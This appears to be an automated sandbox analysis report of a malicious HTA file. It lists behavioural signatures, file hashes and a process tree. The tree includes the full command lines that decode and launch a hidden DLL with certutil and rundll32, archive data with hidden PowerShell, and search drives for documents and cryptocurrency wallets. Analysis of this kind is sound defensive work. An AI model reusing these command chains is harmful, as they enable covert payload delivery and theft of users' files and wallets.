Analysis

  • max time kernel
    149s
  • max time network
    152s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    02/11/2024, 08:04

General

  • Target

    bcdc99e0f17486aa5a5faa0b9e7d7ccbeaa5372626733433214bb722ba260234.hta

  • Size

    70KB

  • MD5

    4b4622857d5a8049c8eabc65cbbf9759

  • SHA1

    3c0b1087394f1584a53ae19a60eeee26adf5323a

  • SHA256

    bcdc99e0f17486aa5a5faa0b9e7d7ccbeaa5372626733433214bb722ba260234

  • SHA512

    bd4e13fc189cff886ac5097814fb35145d897c8f3626df93ba1413fdb38117d3df48152fa099c3bfb4852760425bb97f07aa6020e61331580c7780604285cf9e

  • SSDEEP

    1536:qzp24Z02CaLYQZ3h+3vsA7gI8GLRMsQMIF9AbR0F:ErZFJYYx+fsAD8qqsQMIFKC

Malware Config

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Runs PowerShell with a hidden display window.

  • Looks for VMWare Tools registry key 2 TTPs 1 IoCs
  • Loads dropped DLL 8 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Deobfuscate/Decode Files or Information 1 TTPs 4 IoCs

    Payload decoded via CertUtil.

  • UPX packed file 11 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 60 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\bcdc99e0f17486aa5a5faa0b9e7d7ccbeaa5372626733433214bb722ba260234.hta"
    1⤵
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2496
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c cd /d C:\Users\Admin\AppData\Local\Temp & findstr /b "a2ZneGw7" "C:\Users\Admin\AppData\Local\Temp\bcdc99e0f17486aa5a5faa0b9e7d7ccbeaa5372626733433214bb722ba260234.hta">1.log & certutil -decode -f 1.log password.txt & del 1.log && password.txt
      2⤵
      • Deobfuscate/Decode Files or Information
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2944
      • C:\Windows\SysWOW64\findstr.exe
        findstr /b "a2ZneGw7" "C:\Users\Admin\AppData\Local\Temp\bcdc99e0f17486aa5a5faa0b9e7d7ccbeaa5372626733433214bb722ba260234.hta"
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2864
      • C:\Windows\SysWOW64\certutil.exe
        certutil -decode -f 1.log password.txt
        3⤵
        • Deobfuscate/Decode Files or Information
        • System Location Discovery: System Language Discovery
        PID:2984
      • C:\Windows\SysWOW64\NOTEPAD.EXE
        "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\password.txt
        3⤵
        • System Location Discovery: System Language Discovery
        • Opens file in notepad (likely ransom note)
        PID:2604
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c cd /d C:\Users\Admin\AppData\Local & findstr /b "TVqQAAMAAA" "C:\Users\Admin\AppData\Local\Temp\bcdc99e0f17486aa5a5faa0b9e7d7ccbeaa5372626733433214bb722ba260234.hta">1.log & certutil -decode -f 1.log netserv32.dll & del 1.log & rundll32 netserv32.dll,MainWork
      2⤵
      • Deobfuscate/Decode Files or Information
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:3000
      • C:\Windows\SysWOW64\findstr.exe
        findstr /b "TVqQAAMAAA" "C:\Users\Admin\AppData\Local\Temp\bcdc99e0f17486aa5a5faa0b9e7d7ccbeaa5372626733433214bb722ba260234.hta"
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2756
      • C:\Windows\SysWOW64\certutil.exe
        certutil -decode -f 1.log netserv32.dll
        3⤵
        • Deobfuscate/Decode Files or Information
        • System Location Discovery: System Language Discovery
        PID:2204
      • C:\Windows\SysWOW64\rundll32.exe
        rundll32 netserv32.dll,MainWork
        3⤵
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2724
        • C:\Windows\system32\rundll32.exe
          rundll32 netserv32.dll,MainWork
          4⤵
          • Blocklisted process makes network request
          • Looks for VMWare Tools registry key
          • Loads dropped DLL
          • Accesses Microsoft Outlook accounts
          • Adds Run key to start application
          • Checks for VirtualBox DLLs, possible anti-VM trick
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:2844
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -w hidden Compress-Archive -CompressionLevel Optimal -Path "C:\Users\Admin\AppData\Local\Temp\nsv9B18.tmp" "C:\Users\Admin\AppData\Local\micro.log.zip"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1928
          • C:\Windows\system32\cmd.exe
            cmd.exe /c dir C:\Users\Admin\*.hwp C:\Users\Admin\*.pdf C:\Users\Admin\*.doc C:\Users\Admin\*.docx C:\Users\Admin\*.xls C:\Users\Admin\*.xlsx C:\Users\Admin\*.zip C:\Users\Admin\*.rar C:\Users\Admin\*.egg C:\Users\Admin\*.txt C:\Users\Admin\*.jpg C:\Users\Admin\*.png C:\Users\Admin\*.jpeg C:\Users\Admin\*.alz /s >> "c:\users\admin\appdata\local\netlist.log"
            5⤵
            PID:1828
          • C:\Windows\system32\cmd.exe
            cmd.exe /c dir C:\Users\Admin\*wallet* C:\Users\Admin\UTC--* /s >> "c:\users\admin\appdata\local\netlist.log"
            5⤵
            PID:1732
          • C:\Windows\system32\cmd.exe
            cmd.exe /c dir d:\*.hwp d:\*.pdf d:\*.doc d:\*.docx d:\*.xls d:\*.xlsx d:\*.zip d:\*.rar d:\*.egg d:\*.txt d:\*.jpg d:\*.png d:\*.jpeg d:\*.alz /s >> "c:\users\admin\appdata\local\netlist.log"
            5⤵
            PID:1260
          • C:\Windows\system32\cmd.exe
            cmd.exe /c dir d:\*wallet* d:\UTC--* /s >> "c:\users\admin\appdata\local\netlist.log"
            5⤵
            PID:448
          • C:\Windows\system32\cmd.exe
            cmd.exe /c dir f:\*.hwp f:\*.pdf f:\*.doc f:\*.docx f:\*.xls f:\*.xlsx f:\*.zip f:\*.rar f:\*.egg f:\*.txt f:\*.jpg f:\*.png f:\*.jpeg f:\*.alz /s >> "c:\users\admin\appdata\local\netlist.log"
            5⤵
            PID:2392
          • C:\Windows\system32\cmd.exe
            cmd.exe /c dir f:\*wallet* f:\UTC--* /s >> "c:\users\admin\appdata\local\netlist.log"
            5⤵
            PID:2924

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\1.log
    Filesize: 59KB
    MD5: 71593a662d03e58b27b29ab199a6d7b5
    SHA1: d24e55399d35ac3a25f1b6a8d3bdd0e3e37db5d2
    SHA256: e6da91d2fc4d3029e3915e9f7fc9586bf76f8ee024082c05ee4e5bf0f174c237
    SHA512: c8005c9131b575f15ccd8bcde0fe66f820fff8b4c54800fdcaf814c1aede5f98343854276c301210c0935bf2669f925eafc2ecd15ff88496ededd918bfca3b07

  • C:\Users\Admin\AppData\Local\Temp\1.log
    Filesize: 22B
    MD5: 2ac7510166832b4a6e4344f37d944578
    SHA1: c766dd5112d72620614842d4bf0e986c34c5a2d0
    SHA256: 09e4c6d57fbf21a95fab469149ac50d73ee046f2bc2e57b6565eb0e9adf9e1ad
    SHA512: ecb5c29e8e1d81b914b1d4c3e2787cf2b78d5707473f368aa48df6af1b7235adac5f96ccd43cfc0501f93640b52dd4b06905c889ffd0e9b7c989e150c89e521a

  • C:\Users\Admin\AppData\Local\Temp\password.txt
    Filesize: 14B
    MD5: 6a0e721cb89a06736206b91af92239cd
    SHA1: bb87db8bbcb512a584c45c80504fc21a0a972b3a
    SHA256: a5a56f7eed7db360188ca88386bed5c84a8146b99ece4e68a3abfdbb5f091015
    SHA512: c9921cafd2a284c3bc32b845685e25f03bc9fbaa380dbecbe8bfd9ec4992d5cf4a832e462cf097bcbc12f1ae3b00a0c8e7688be373aede81a9bd331d400b6a0c

  • C:\Users\Admin\AppData\Local\net
    Filesize: 478KB
    MD5: de9438683614ccf3f0316139418985a9
    SHA1: dcbbfb18c16f4bf9025233e6ecf42be64c33932d
    SHA256: d5ec8265369b5f52a14b039c1f9495a343a9755a89b0c48db5983c94d140f18b
    SHA512: 925a919ecbe169adc2ebb10b9f93cc33ab5ba44794d3fccd0d7f2faa49c8a35b46e3c6779d0e357122433461bf48fc4af2f9571fae0aa11fd85c9dcc26a47470

  • C:\Users\Admin\AppData\Local\notepad.log
    Filesize: 139KB
    MD5: 6199c9d0ad1df4105c85ae041e833a0e
    SHA1: c9016a4bcd8bd2ea646dfa86e2c9c59cd9f50fd1
    SHA256: c45b1bb615385f2b2b2c1bfb29646a89ef9beb9c4f00cbb5f16c02171c61bcf4
    SHA512: b2b972ba63cfb93c6b59634ecf5f8ffda04c74ba9ee86dbd8fefea43ff408f86718a75a0e9282ba5fe122cb3079511847c6775393e1e2d5c556ec3e8ab599de3

  • \??\c:\users\admin\appdata\local\netlist.log
    Filesize: 8KB
    MD5: 4c3a362b3f3e30e0d09cf23cf206d4f3
    SHA1: 8c83105c017fdd64b2bc094f295bfaa8ce074b39
    SHA256: 47efee3b0891b28c7ad69ba95c06f5fd2a45e0df0e4ec62307a24793a51b52bd
    SHA512: c78174e522de99a4774b764d0b465d8dc0035d4aa4e46a5306f3985afc814af0290c1af11b78c0656d6915b0ddc36ecc726a21666694ebecc87277120f9dfda4

  • \??\c:\users\admin\appdata\local\netlist.log
    Filesize: 9KB
    MD5: 38eb30a99834452a25809864e7116beb
    SHA1: 80271700c164e13a7a871d8530a71898bf4a64bc
    SHA256: 77062eba27314013f04f6a3aad6c6d60d5e2a9a9a289ea34fd83e87ccf9167b0
    SHA512: 48e013c5ca505310ee98f059c84fc619e1e41b03ab3fc9248688194e75eaa8a56bc7a6a68cb100c42115170b5791ba29d66ad381f2e4298660f0c72f8c4ed208

  • \Users\Admin\AppData\Local\netserv32.dll
    Filesize: 44KB
    MD5: 56d4fcfa7eb3a84740081264c5c0f10a
    SHA1: 06edf5464d2cfe1a75f3600c9039eabab97248bd
    SHA256: 5a18a29791cfb18767a43bebb61f923e64be7988235213678514007174f60b3e
    SHA512: df622d9aebc8b9367219777216ba7e21942974e048fa40233fb17d17a85d940f8301ab4c605703cfa4b9ffdc61f2095b2a96b6256d017b445e40e94aedfd8609

  • memory/1928-86-0x0000000002890000-0x0000000002898000-memory.dmp
    Filesize: 32KB

  • memory/1928-85-0x000000001B6C0000-0x000000001B9A2000-memory.dmp
    Filesize: 2.9MB

  • memory/2724-34-0x0000000000220000-0x000000000023F000-memory.dmp
    Filesize: 124KB

  • memory/2724-35-0x0000000000220000-0x000000000023F000-memory.dmp
    Filesize: 124KB

  • memory/2724-33-0x0000000000220000-0x000000000023F000-memory.dmp
    Filesize: 124KB

  • memory/2724-94-0x0000000000220000-0x000000000023F000-memory.dmp
    Filesize: 124KB

  • memory/2724-36-0x0000000000220000-0x000000000023F000-memory.dmp
    Filesize: 124KB

  • memory/2724-92-0x0000000000220000-0x000000000023F000-memory.dmp
    Filesize: 124KB

  • memory/2844-68-0x0000000180000000-0x0000000180127000-memory.dmp
    Filesize: 1.2MB

  • memory/2844-67-0x0000000180000000-0x0000000180127000-memory.dmp
    Filesize: 1.2MB

  • memory/2844-64-0x0000000180000000-0x0000000180127000-memory.dmp
    Filesize: 1.2MB

  • memory/2844-52-0x000007FEFB1B0000-0x000007FEFB1CF000-memory.dmp
    Filesize: 124KB

  • memory/2844-101-0x0000000180000000-0x0000000180032000-memory.dmp
    Filesize: 200KB

  • memory/2844-117-0x000007FEFB1B0000-0x000007FEFB1CF000-memory.dmp
    Filesize: 124KB

  • memory/2844-119-0x000007FEFB1B0000-0x000007FEFB1CF000-memory.dmp
    Filesize: 124KB

  • memory/2844-118-0x000007FEF7DE0000-0x000007FEF7DFF000-memory.dmp
    Filesize: 124KB

  • memory/2844-121-0x000007FEF7DE0000-0x000007FEF7DFF000-memory.dmp
    Filesize: 124KB

  • memory/2844-53-0x000007FEF7DE0000-0x000007FEF7DFF000-memory.dmp
    Filesize: 124KB

  • memory/2844-54-0x000007FEFB1B0000-0x000007FEFB1CF000-memory.dmp
    Filesize: 124KB

  • memory/2844-134-0x000007FEF7DE0000-0x000007FEF7DFF000-memory.dmp
    Filesize: 124KB

  • memory/2844-139-0x000007FEF7DE0000-0x000007FEF7DFF000-memory.dmp
    Filesize: 124KB

  • memory/2844-140-0x000007FEF7DE0000-0x000007FEF7DFF000-memory.dmp
    Filesize: 124KB